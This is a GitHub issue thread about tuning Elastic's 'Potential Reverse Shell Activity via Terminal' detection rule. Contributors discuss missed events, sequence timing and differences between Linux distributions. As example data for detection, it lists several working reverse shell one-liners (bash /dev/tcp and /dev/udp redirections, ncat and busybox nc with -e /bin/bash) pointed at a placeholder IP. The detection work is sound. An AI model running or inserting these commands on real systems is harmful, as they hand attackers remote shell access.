### ISSUE TITLE
[Rule Tuning] Potential Reverse Shell Activity via Terminal

### ISSUE THREAD

**Issue by ilhemtahiri** [elastic/detection-rules#2919]
## Link to rule
https://www.elastic.co/guide/en/security/8.6/potential-reverse-shell-activity-via-terminal.html

## Description

It appears that the current rule is not effectively capturing the complete bash reverse shell commands. The issue lies in the logs, which does not include the entire command after the ">&" or "5<>"operators. As a result, we are unable to obtain the IP address and port information used in the reverse shell. The ">&" operator redirects both the standard output and standard error to a specified destination, making it difficult to extract the relevant details from the logs.

<img width="1166" alt="Screenshot 2023-07-11 at 11 14 34 AM" src="https://github.com/elastic/detection-rules/assets/129174551/610dc814-74b6-4f56-b2bf-d12f4ce4d4d1">

This command is functioning correctly because it is considering this part 'exec bash -i &>/dev/tcp/10.10.10.10/9001 <&1' as a 3rd argument  : 
```
bash -c 'exec bash -i &>/dev/tcp/10.10.10.10/9001 <&1'
```
<img width="1178" alt="Screenshot 2023-07-11 at 11 33 34 AM" src="https://github.com/elastic/detection-rules/assets/129174551/8d4010a8-08b1-46b0-bc8b-13bdd06d7e8f">

## Example Data

These commands, which have been previously mentioned, are not captured by the current rule, and their arguments are incomplete, as shown in the first figure above. It is important to consider these commands when tuning the rule to ensure their detection.

```
/bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1
```
```
0<&196;exec 196<>/dev/tcp/10.10.10.10/9001; /bin/bash <&196 >&196 2>&196
```
```
/bin/bash -i >& /dev/udp/10.10.10.10/9001 0>&1
```
```
/bin/bash -i 5<> /dev/tcp/10.10.10.10/9001 0<&5 1>&5 2>&5
```
```
exec 5<>/dev/tcp/10.10.10.10/9001;cat <&5 | while read line; do $line 2>&5 >&5; done
```

**Comment by w0rk3r** [comment]
cc @shashank-elastic @Aegrah @DefSecSentinel

**Comment by Aegrah** [comment]
Hi @ilhemtahiri thanks for reaching out. A few days ago, we pushed some new reverse shell detection rules for Linux [here](https://github.com/elastic/detection-rules/pull/2905) and another one for UDP is coming soon. These rules should be able to capture the behavior you mentioned above. Would you mind testing this, and reaching out to us with your results?

Thanks!

**Comment by ilhemtahiri** [comment]
Thank you, @Aegrah, for your response. I came across the issue with the [[New Rules] ](https://github.com/elastic/detection-rules/pull/2905) you mentioned last week, and I found it to be quite useful. Regarding the tests, I have already evaluated both the first and second rules. I have observed that the second rule, "[Potential Reverse Shell via Suspicious Child Process](https://github.com/elastic/detection-rules/pull/2905)," is not effectively capturing the behavior in most cases when the process name is "ncat". This is because the connection_attempted event is being ingested simultaneously with the disconnect_received event, thereby preventing the rule from capturing these events. Allow me to provide an example to illustrate this:

For instance, when executing the following command:
```
ncat 10.10.10.10 9003 -e /bin/bash
```

I observed that the second rule failed to capture the associated events due to their simultaneous ingestion with the disconnect_received event.

![Screenshot 2023-07-13 at 2 15 26 PM](https://github.com/elastic/detection-rules/assets/129174551/88ccb4e1-0a6d-46dc-9ea0-3c937920c9a1)

And as a suggested tuning, you can consider treating commands with the process name "busybox" as well.

```
busybox nc 10.10. 9001 -e /bin/bash
```

**Comment by Aegrah** [comment]
@ilhemtahiri I did some extra testing, but for me it does capture ncat every single time. The query is looking for a sequence of an `exec` followed by a `connection_attempted` event, with the same `process.entity_id`. This should mean that `ncat 10.10.10.10 9003 -e /bin/bash` given the data in your image should trigger the alert. The only case where this should not work due to timing, is when the `exec` and `connection_attempted` events are ingested simultaneously. The `disconnect_received` event should not really have an impact on the sequence rule. 

How are you testing this? An efficient way of testing it would not be to run the detection rule itself, but to use the `timelines` feature within Elastic Security. Here you can paste your query and test more easily. 

<img width="2406" alt="image" src="https://github.com/elastic/detection-rules/assets/78494512/8b413eca-9e9f-4c93-bf30-23fcfbeb85c5">

The suggested tuning to add cases where a utility is called through `busybox` is a good call, but if I implement this, I should implement it for all the utilities, not just ncat. I will add this to my tuning docs. Thank you!

**Comment by ilhemtahiri** [comment]
Hi @Aegrah, yes, the query is looking for a sequence of an ```exec``` event followed by a ```connection_attempted``` event with the same ```process.entity_id``` but within a ```maxspan=1s```. So, in my case, it will never trigger the alert. Regarding the ```disconnect_received``` event, you are right; it should not impact the sequence rule. I mentioned that it is being ingested simultaneously with the ```connection_attempted``` event to demonstrate that the ```connection_attempted``` event is not ingested with the ```exec``` event, so it's dependent on the listener disconnect, which will augment the ```maxspan``` to be greater than 1 second.

For testing, I used both methods: running the detection rule itself, and I also used the timeline, but in my case, the timeline won't capture anything due to the ```maxspan``` being set to 1 second. So we have just the discover to find out what's going on!!

Can you please tell me which Linux distribution you are using? Because in Ubuntu, it works fine for me too. The problem is in Kali! I'm not sure yet of the cause, but after troubleshooting both environments, I found that Ubuntu is using the **traditional syslog**, and Kali uses **journal**. So I think it's related to the system's log configurations, and if that's the case, this rule won't work for **Fedora**, **CentOS**, **RedHat**, **Alma Linux**, **Rocky Linux**, or any distros based on the **_RedHat family_**, and so on. The figures below show what I'm talking about.


<img width="1410" alt="Screenshot 2023-07-24 at 9 56 38 AM" src="https://github.com/elastic/detection-rules/assets/129174551/b0db1cac-e214-4ef8-ab7a-c5cc6c5927e1">

## Log directories in both ubuntu and kali :
<img width="1053" alt="Screenshot 2023-07-24 at 11 04 47 AM" src="https://github.com/elastic/detection-rules/assets/129174551/29c2247f-7b98-4170-9314-fde4b4643f62">

**Comment by Aegrah** [comment]
Hi @ilhemtahiri thank you for all of the testing and your persistence! I did all of my initial testing on both a ubuntu server and a minimal debian install, and due to your comment I just tested on a fresh CentOS stream 9 server and on a fresh installed Kali Linux image. And once again, the rule detects the behavior just as I would expect..

<img width="2505" alt="image" src="https://github.com/elastic/detection-rules/assets/78494512/abe2edd3-c229-459a-8c40-794b6e35e581">

On my Kali Linux installation, as long as I don't cancel the reverse shell, I just get the following 3 events:

<img width="2417" alt="image" src="https://github.com/elastic/detection-rules/assets/78494512/c9d6c5c0-d95e-4f3f-b8b8-e68a59cd914c">

Only after killing the shell, the disconnect log is ingested. Could you give it a try on a freshly installed Kali Linux image? In my case, I am running the following Kali version:
```
┌──(kali㉿kali01)-[~]
└─$ uname -a
Linux kali01 6.1.0-kali7-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.20-1kali1 (2023-03-22) x86_64 GNU/Linux
``` 
My CentOS version:
```
Linux [...REDACTED...] 5.14.0-325.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jun 9 19:47:16 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
```
If it works for you on a fresh install, we can troubleshoot more specificly.
